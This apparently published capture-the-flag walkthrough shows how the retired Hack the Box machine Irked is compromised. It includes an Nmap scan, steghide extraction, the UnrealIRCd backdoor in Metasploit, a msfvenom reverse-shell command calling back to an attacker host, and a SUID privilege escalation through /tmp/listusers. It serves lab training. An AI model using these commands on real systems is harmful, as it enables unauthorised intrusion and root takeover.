Capture the flag (CTF)

Hack the Box (HTB) machine walkthrough series — Irked

Security Ninja
June 20, 2019 by
Security Ninja

Today, we will be continuing with our exploration of Hack the Box (HTB) machines as seen in previous articles. This walkthrough is of an HTB machine named Irked.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other challenges as well. Individuals have to solve the puzzle (simple enumeration plus pentest)  in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform.

Note: Only write-ups of retired HTB machines are allowed. The machine in this article, named Irked, is retired.

The walkthrough

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The Irked machine IP is 10.10.10.117.

3. We will adopt the same methodology of performing penetration testing. Let’s start with enumeration in order to learn as much information about the machine as possible.

4. As usual, let’s start with the Nmap scan to gather more information about the services running on this machine. [CLICK IMAGES TO ENLARGE]
<<nmap -sC -sV -oA irked 10.10.10.117>>

5. As we can see, ports 22, 80 and 111 are discovered.

6. Let’s start the enumeration on port 80. Below is the landing page. One hint the page gives is that IRC is working on this box, but the initial Nmap scan does not reflect that. That indicates that we need to perform a full port scan as well.

7. Launching a full-blown scan on the box reveals the following IRC ports. It looks like the service UnrealIRCd is running on the box. The interesting part is that this same service is on three ports.

8. Back to enumeration of the image on port 80. Download the file and run steghide on it. It looks like there is embedded data in the box. I tried with a blank passphrase but could not extract the data, which means we need to find the key for it.
<<steghide info irked.jpg>>

9. As discovered above, we found UnrealIRCd, and it looks like there is an exploit for this. We’ll download and modify it to suit our needs.

10. In this we will need to insert a Ruby reverse shell. Let’s generate one.
<<msfvenom -p cmd/unix/reverse_perl LHOST=<attacking machine ip> LPORT=1234 -f raw>>

11. Insert it into the payload1 variable and remove the other payload variables.

12. We set up a listener and execute the exploit on all three ports but could not get a reverse connection back.

13. There is a Metasploit exploit for this as well. Select the right exploit and set up options as below.

exploit=unreal_ircd_3281_backdoor

RHOST=10.10.10.117

RPORT=6667

14. As you can see, there was no session created.

15. We try the same but change the RPORT to 8067, as shown below.

16. In this case, we get a reverse shell back. Now we’re escaping the jail shell with a Python one-liner.
<<python -c ‘import pty;pty.spawn(“/bin.bash”)’>>

17. We got a better shell now. Executing a command to list the contents:
<<ls -la>>

18. We got the directory for user “djmardov.” Under Documents, there is a user.txt, but it looks like permission is denied. Because we are currently under the ircd user, we need to escalate to djmardov.

19. There is a backup file as well. Let’s examine the contents of this file. Looks like a password, but where do we apply it? If you remember, we have a pending password for the initial image.

20. Applying the password to the image again results in successful extraction of a password.

<<steghide extract -sf irked.jpg>>

<<cat pass.txt>>

21. Let’s use this password for djmardov. We have an SSH port opened also.
<<ssh djmardov@10.10.10.17>>

22. And we are successful. Browsing to grab the user.txt file.

<<cd Documents>>

<<cat user.txt>>

23. Now let’s begin enumeration to escalate privileges as well.

24. As is mentioned in previous articles, one of the ways to do this is to check for the SUID bit set. In this case, we have binary “viewuser” in /usr/bin.
<<find / -perm -u=s -type f 2>/dev/null>>

25. Running this file, it requires a file called /tmp/listusers and executes it.

<<ls -l /usr/bin/viewuser>>

<</sus/bin/viewuser>>

26. We can create our own /tmp/listusers and add ‘/bin/sh’ to it.

<<echo ‘/bin/sh’ > /tmp/listusers>>

Chmod 777 /tmp/listusers

Whoami

27. And we are at root. Grabbing the root.txt contents.

<<cd /root>>

<<cat root.txt>>

This was a machine based on enumeration. First, we needed to do a full port scan to uncover the hidden service and then exploit it. Privilege escalation to root was straightforward.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

We will continue this series with more such interesting HTB machines!

Security Ninja
Security Ninja